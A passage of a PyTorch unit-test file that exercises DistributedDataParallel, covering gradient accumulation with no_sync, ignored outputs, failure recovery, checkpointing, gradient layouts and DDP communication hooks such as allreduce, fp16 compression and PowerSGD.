super(NoGradModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
NoGradModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
input = torch.rand([batch_size, 2], dtype=torch.float)
def check_no_grads():
for p in model.parameters():
self.assertTrue(p.requires_grad)
self.assertIsNone(p.grad)
# After initialization, no parameter has their gradient set.
check_no_grads()
# Run `forward` function with torch.no_grad()
with torch.no_grad():
output = model(input)
self.assertTrue(isinstance(output, torch.Tensor))
# No parameter should have their gradient set.
check_no_grads()
def _test_accumulate_gradients_no_sync(
self, num_iters=2, ddp_comm_hook=None, gradient_as_bucket_view=False
):
"""
This is the recommended way to implement accumulate grads.
If ``ddp_comm_hook`` input was specified, it will also register that hook
to the ``ddp_model``. The hook fed into this function should not change
the resulting gradients.
"""
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
local_batch_size = len(devices)
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
if ddp_comm_hook is not None:
ddp_model.register_comm_hook(process_group, ddp_comm_hook)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
with ddp_model.no_sync():
ddp_model.train()
ddp_model(input)
# check two model parameters over num_iters iterations
for iteration in range(num_iters):
# single cpu/gpu training
step_model(model, input, target)
ddp_input = input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
]
ddp_target = target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
]
if iteration % num_iters == 0:
# accumulate grads locally
with ddp_model.no_sync():
step_model(ddp_model, ddp_input, ddp_target)
else:
# sync grads
step_model(ddp_model, ddp_input, ddp_target)
for i, j in zip(model.parameters(), ddp_model.parameters()):
if iteration % num_iters == 0:
self.assertNotEqual(i.grad, j.grad)
else:
self.assertEqual(i.grad, j.grad)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync(self):
"""
Runs _test_accumulate_gradients_no_sync using default inputs
"""
self._test_accumulate_gradients_no_sync()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync_grad_is_view(self):
"""
Runs _test_accumulate_gradients_no_sync using default inputs
"""
self._test_accumulate_gradients_no_sync(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync_allreduce_hook(self):
"""
Runs multiple iterations on _test_accumulate_gradients_no_sync
using allreduce hook and validates whether future result was properly
passed as gradients in reducer.
"""
def allreduce_hook(
process_group: object, bucket: dist.GradBucket
) -> torch._C.Future:
tensors = [bucket.get_tensor() / self.world_size]
return process_group.allreduce(tensors).get_future()
self._test_accumulate_gradients_no_sync(
num_iters=4, ddp_comm_hook=allreduce_hook
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync_allreduce_with_then_hook(self):
"""
Runs multiple iterations on _test_accumulate_gradients_no_sync using allreduce
hook that also uses then callbacks. In first then callback result is multiplied
by 2, and the second callback divides the result by 2 * world_size. It validates
whether final result was properly passed as gradients in reducer.
"""
def allreduce_with_then_hook(
process_group: object, bucket: dist.GradBucket
) -> torch.futures.Future:
fut = process_group.allreduce([bucket.get_tensor()]).get_future()
def mult(fut):
# Multiply the result by 2.
return [2 * t for t in fut.wait()]
def div(fut):
# Divide the result by 2 * world_size.
return [t / (2 * self.world_size) for t in fut.wait()]
return fut.then(mult).then(div)
self._test_accumulate_gradients_no_sync(
num_iters=4, ddp_comm_hook=allreduce_with_then_hook
)
def _test_accumulate_gradients_module(self, gradient_as_bucket_view=False):
# This is NOT the recommended way to implement accumulating grads, but
# we would like to make sure DDP does not mess up with the underlying
# module.
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
ddp_model.train()
ddp_model.module(input)
# Check two model parameters over 4 iterations.
# Use 4 iterations because we alternate between reducing and
# not reducing and want to make sure we switch both ways.
for iteration in range(4):
step_model(model, input, target)
if iteration % 2 == 0:
# Skip gradients sync without calling prepare_for_backward
step_model(
ddp_model.module,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertNotEqual(i.grad, j.grad)
else:
step_model(
ddp_model,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(i.grad, j.grad)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module(self):
self._test_accumulate_gradients_module()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module_with_grad_is_view(self):
self._test_accumulate_gradients_module(gradient_as_bucket_view=True)
@requires_gloo()
def test_ignored_output(self):
"""
Test that the output of a model can be ignored and that there is no
implicit requirement that `backward` gets called.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
class IgnoredOutput(nn.Module):
def __init__(self):
super(IgnoredOutput, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
model = DistributedDataParallel(
IgnoredOutput().float(),
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
# Run a few iterations where we ignore the output.
for _ in range(4):
output = model(input)
del output
# Run a few iterations where we use the output.
for _ in range(4):
output = model(input)
loss = criterion(output, target)
loss.backward()
@requires_gloo()
def test_ignored_output_with_unused_parameters(self):
"""
Test that the output of a model can be ignored and that there is no
implicit requirement that `backward` gets called, if not all model
parameters participated in computing the model output.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
class IgnoredOutputWithUnusedParameters(nn.Module):
def __init__(self):
super(IgnoredOutputWithUnusedParameters, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
model = DistributedDataParallel(
IgnoredOutputWithUnusedParameters().float(),
process_group=process_group,
find_unused_parameters=True,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
# Run a few iterations where we ignore the output.
for _ in range(4):
output = model(input)
del output
# Run a few iterations where we use the output.
for _ in range(4):
output = model(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_failure_recovery(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# need to create a separate file for the recovered FileStore, because
# the original one will be deleted when destructing the first FileStore.
recovery_filename = self.file_name + "_recovery"
if self.rank == 0:
# the file will be deleted by the recovered FileStore
open(recovery_filename, "w").close()
# not necessary to run barrier here, as DDP will synchronize
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = TestModel().float().to(device_id)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
del ddp
del process_group
del store # this will delete self.file_name
store = c10d.FileStore(recovery_filename, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_default_pg(self):
dist.init_process_group(
"nccl",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
default_pg = c10d.distributed_c10d._get_default_group()
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_save_load_checkpoint(self):
dist.init_process_group(
"gloo",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
def train_loop(model, optimizer, iterations):
for _ in range(iterations):
optimizer.zero_grad()
output = model(input)
loss = criterion(output, target)
loss.backward()
optimizer.step()
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model_withload = TestModel().float().to(device_id)
model_withoutload = TestModel().float().to(device_id)
ddp_withload = DistributedDataParallel(
model_withload,
device_ids=[device_id],
)
ddp_withoutload = DistributedDataParallel(
model_withoutload,
device_ids=[device_id],
)
# ensure that all the three models start with the same set of parameters. By default they are randomized on construction
for p in ddp_withload.parameters():
with torch.no_grad():
p.zero_()
for p in model_withload.parameters():
with torch.no_grad():
p.zero_()
for p in ddp_withoutload.parameters():
with torch.no_grad():
p.zero_()
batch_size = 4
criterion = nn.CrossEntropyLoss()
optimizer_withload = torch.optim.SGD(ddp_withload.parameters(), lr=0.001)
optimizer_non_ddp_withload = torch.optim.SGD(model_withload.parameters(), lr=0.001)
optimizer_withoutload = torch.optim.SGD(ddp_withoutload.parameters(), lr=0.001)
input = torch.rand([batch_size, 2], dtype=torch.float).to(device_id)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# run the model for 6 iterations, with a checkpoint in the middle
train_loop(ddp_withload, optimizer_withload, 3)
# zero out parameters of both DDP and non-DDP models and reload them from the DDP state dict
checkpoint_path = tempfile.gettempdir() + "/model.checkpoint"
if self.rank == 0:
torch.save(ddp_withload.state_dict(), checkpoint_path)
dist.barrier()
map_location = {"cuda:%d" % 0: "cuda:%d" % self.rank}
ddp_state_dict = torch.load(checkpoint_path, map_location=map_location)
for model in [ddp_withload, model_withload]:
for p in ddp_withload.parameters():
with torch.no_grad():
p.zero_()
ddp_withload.load_state_dict(ddp_state_dict)
# the non-DDP model needs to first remove the prefix of "module." from the DDP state dict
torch.nn.modules.utils.consume_prefix_in_state_dict_if_present(ddp_state_dict, "module.")
model_withload.load_state_dict(ddp_state_dict)
train_loop(ddp_withload, optimizer_withload, 3)
train_loop(model_withload, optimizer_non_ddp_withload, 3)
# re-run the model with the same inputs for 6 iterations with no checkpoint
train_loop(ddp_withoutload, optimizer_withoutload, 6)
for p_withload, p_withoutload, p_non_ddp_withload in zip(
ddp_withload.parameters(), ddp_withoutload.parameters(), model_withload.parameters()
):
self.assertEqual(p_withload, p_withoutload)
self.assertEqual(p_non_ddp_withload, p_withoutload)
def _run_and_verify_sparse_gradients(self, vanilla_model, ddp_model):
mult = 2
batch_size = mult * self.world_size
criterion = nn.CrossEntropyLoss()
input = torch.randint(0, 10, [batch_size, 2])
target = torch.randint(0, 10, [batch_size])
# Run with entire batch against single process version
criterion(vanilla_model(input), target).backward()
# Run with partial batch against multi process version
partial_input = input.split(mult)[self.rank]
partial_target = target.split(mult)[self.rank]
criterion(ddp_model(partial_input), partial_target).backward()
# Check that the gradients are sparse and identical
vanilla_parameter = next(vanilla_model.parameters())
ddp_parameter = next(ddp_model.parameters())
self.assertEqual(vanilla_parameter.grad, ddp_parameter.grad)
def _test_sparse_gradients(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Ensure initialized weights and inputs are identical across processes
torch.manual_seed(1337)
vanilla_model = SparseGradientModule()
ddp_model = DistributedDataParallel(
copy.deepcopy(vanilla_model),
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
self._run_and_verify_sparse_gradients(vanilla_model, ddp_model)
@requires_gloo()
def test_sparse_gradients(self):
self._test_sparse_gradients()
@requires_gloo()
def test_sparse_gradients_grad_is_view(self):
self._test_sparse_gradients(gradient_as_bucket_view=True)
def _test_grad_layout(self, replica_devices, layer_devs, local_batch_size):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = local_batch_size * self.world_size
# Carry out some trials with small buckets and some with big buckets.
bucketsizes = (0.000001, 25)
# Tuples of lists. Each list describes per-layer characteristics for one trial.
layer_formats = (
[torch.contiguous_format] * 4,
[torch.channels_last] * 2 + [torch.contiguous_format] * 2,
[torch.channels_last] * 4,
)
layer_dtypes = (
[torch.float] * 4,
[torch.float] * 2 + [torch.half] * 2,
[torch.half] * 4,
)
input_dev = layer_devs[0] if isinstance(layer_devs, list) else layer_devs
target_dev = layer_devs[-1] if isinstance(layer_devs, list) else layer_devs
input = torch.randn(
(global_batch_size, 8, 8, 8), device=input_dev, dtype=torch.float
)
target = torch.randn(
(global_batch_size, 8, 4, 4), device=target_dev, dtype=torch.float
)
local_batch_start = self.rank * local_batch_size
local_batch_end = (self.rank + 1) * local_batch_size
# Reducer.cpp sneakily creates one "initial bucket" that ignores the "bucket_cap_mb"
# argument. The following makes sure the initial bucket also complies.
@contextmanager
def first_bucket_size(ddp_bucket_mb):
old_DEFAULT_FIRST_BUCKET_BYTES = dist._DEFAULT_FIRST_BUCKET_BYTES
dist._DEFAULT_FIRST_BUCKET_BYTES = int(ddp_bucket_mb * 1.0e6)
try:
yield
finally:
dist._DEFAULT_FIRST_BUCKET_BYTES = old_DEFAULT_FIRST_BUCKET_BYTES
with torch.backends.cudnn.flags(
enabled=True, deterministic=True, benchmark=False
):
for formats, dtypes, bucketsize in product(
layer_formats, layer_dtypes, bucketsizes
):
with first_bucket_size(bucketsize):
model_msg = (
"rank = {} formats = {} dtypes = {} bucketsize = {} ".format(
self.rank, formats, dtypes, bucketsize
)
)
try:
m = ConvNet(layer_devs, formats, dtypes)
m_ddp = DistributedDataParallel(
copy.deepcopy(m),
device_ids=replica_devices,
process_group=process_group,
bucket_cap_mb=bucketsize,
)
opt = torch.optim.SGD(m.parameters(), lr=0.1)
opt_ddp = torch.optim.SGD(m_ddp.parameters(), lr=0.1)
has_half = any(p.dtype is torch.half for p in m.parameters())
tol = 1.0e-3 if has_half else 1.0e-5
except BaseException:
# Prints case-specific debugging info to narrow down failing case.
print(
"Caught exception during model creation for " + model_msg,
flush=True,
)
raise
# 3 iters: First iter creates grads, second iter retests after rebucketing,
# third iter tries zeroed grads.
for it in range(3):
iter_msg = "iter = {} ".format(it) + model_msg
named_msg = iter_msg
try:
F.mse_loss(m(input).float(), target).backward()
F.mse_loss(
m_ddp(input[local_batch_start:local_batch_end]).float(),
target[local_batch_start:local_batch_end],
).backward()
for i, ((layer_name, m_child), m_ddp_child) in enumerate(
zip(m.named_children(), m_ddp.module.children())
):
named_msg = layer_name + ".weight" + " " + iter_msg
self.assertTrue(
m_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
self.assertTrue(
m_ddp_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
for j, ((param_name, p), p_ddp) in enumerate(
zip(
m_child.named_parameters(),
m_ddp_child.parameters(),
)
):
named_msg = (
layer_name + "." + param_name + " " + iter_msg
)
self.assertEqual(
p.grad, p_ddp.grad, rtol=tol, atol=tol
)
opt.step()
opt_ddp.step()
if it == 0:
for p, p_ddp in zip(m.parameters(), m_ddp.parameters()):
p.grad = None
p_ddp.grad = None
else:
m.zero_grad()
m_ddp.zero_grad()
except BaseException:
# Makes sure we still get info if an error occurred somewhere other than the asserts.
print(
"Caught exception during iterations at " + named_msg,
flush=True,
)
raise
@requires_nccl()
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_grad_layout_1devicemodule_1replicaperprocess(self):
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
# Tells DDP to use just one device.
replica_devices = [dev0]
# Tells _test_grad_layout to construct ConvNet with all layers on this process's first assigned device.
layer_devs = dev0
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(4)
@skip_if_rocm
def test_grad_layout_2devicemodule(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
dev0 = torch.device("cuda:" + str(int_devices[0]))
dev1 = torch.device("cuda:" + str(int_devices[1]))
# DDP's default behavior for a multi-device module is "don't replicate."
replica_devices = None
# Tells _test_grad_layout to constructs this process's ConvNet on 2 devices, with 2 layers on each device.
layer_devs = [dev0] * 2 + [dev1] * 2
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_param_layout_mismatch_error(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
layer_devs = dev0
layer_formats = (
[torch.contiguous_format] * 4
if self.rank == 0
else [torch.channels_last] * 4
)
layer_dtypes = [torch.float] * 4
m = ConvNet(layer_devs, layer_formats, layer_dtypes)
if self.rank == 0:
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
else:
with self.assertRaisesRegex(
RuntimeError,
".* appears not to match strides of the same param in process 0",
):
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
@requires_gloo()
def test_ddp_comm_hook_future_passing_cpu(self):
"""
This unit test verifies whether the Future object is passed properly.
The callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Test on CPU
cpu_model = DistributedDataParallel(
ModuleForDdpCommHook().cpu(), process_group=process_group
)
# Register DDP Communication Hook
cpu_model.register_comm_hook(None, self._simple_hook)
# check whether the grads are equal to what then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(cpu_model, 8, 2 * torch.ones(2, 2))
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
[self.assertEqual(p.grad, expected_grad) for p in model.parameters()]
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future:
fut = torch.futures.Future()
fut.set_result([torch.ones_like(bucket.get_tensor())])
def fut_then(fut):
# Add ones to fut's result.
return [t + torch.ones_like(t) for t in fut.value()]
return fut.then(fut_then)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_gloo(self):
"""
This unit test verifies whether the Future object is passed properly using gloo backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_nccl(self):
"""
This unit test verifies whether the Future object is passed properly using nccl backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
def _test_ddp_comm_hook_allreduce_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether a DDP communication hook that just calls
allreduce gives the same result with the case of no hook registered.
Without the then callback, the future_value in reducer is no longer
a PyObject, and this unit test verifies future_value is properly checked.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_hook(state: object, bucket: dist.GradBucket) -> torch._C.Future:
tensors = [bucket.get_tensor() / self.world_size]
return process_group.allreduce(tensors).get_future()
# Get GPU model with allreduce_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_hook, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_default_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether default Python DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# For these default DDP comm hooks, the only state is process group.
state = process_group
for hook in [default.allreduce_hook, default.fp16_compress_hook]:
# Get GPU model with the hook registered.
# The first arg 'process_group' is used for initializing the test environment,
# so it cannot be replaced by 'state', although they have the same value.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_fp16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the FP16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [(powerSGD.powerSGD_hook, powerSGD_state), (default.allreduce_hook, process_group)]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.fp16_compress_wrapper(hook),
gradient_as_bucket_view,
state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_powerSGD_ddp_comm_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether Python DDP communication hook POWER_SGD
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with the hook registered.
# Test the hook with different algorithmic configs.
for use_error_feedback, warm_start in product([True, False], [True, False]):
state = powerSGD.PowerSGDState(
process_group=process_group,
matrix_approximation_rank=1,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
for hook in [powerSGD.powerSGD_hook, powerSGD.batched_powerSGD_hook]:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_builtin_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether built-in C++ DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for comm_hook_type in [
dist.BuiltinCommHookType.ALLREDUCE,
dist.BuiltinCommHookType.FP16_COMPRESS,
]:
# Get GPU model with the built-in communication hook.
gpu_model = self._gpu_model_with_builtin_ddp_comm_hook(
process_group, comm_hook_type, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl(self):
self._test_ddp_comm_hook_allreduce_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl(self):
self._test_default_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_nccl(self):
self._test_fp16_compress_wrapper()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl(self):
self._test_builtin_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl(self):
self._test_powerSGD_ddp_comm_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_grad_is_view(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(gradient_as_bucket_view=True)
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl_is_view(self):
self._test_default_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_is_view(self):
self._test_fp16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl_grad_is_view(self):
self._test_builtin_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl_grad_is_view(self):
self._test_powerSGD_ddp_comm_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_with_then_hook_nccl(self):
"""
This unit test verifies whether a DDP communication hook that calls allreduce and then
multiplies the result by ten and divides by two gives the expected result.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_with_then_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future:
tensors = [bucket.get_tensor() / self.world_size]
fut = process_group.allreduce(tensors).get_future()
def mult(fut):
# Multiply the result by 10.
return [10 * t for t in fut.value()]
def div(fut):
# Divide the result by 2.
return [0.5 * t for t in fut.value()]
return fut.then(mult).then(div)
# Get GPU model with allreduce_with_then_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_with_then_hook
)
# check whether the grads are equal to what allreduce returns multuplied by 5.
# without the comm_hook, result would be still 0.25 * torch.ones(2, 2).
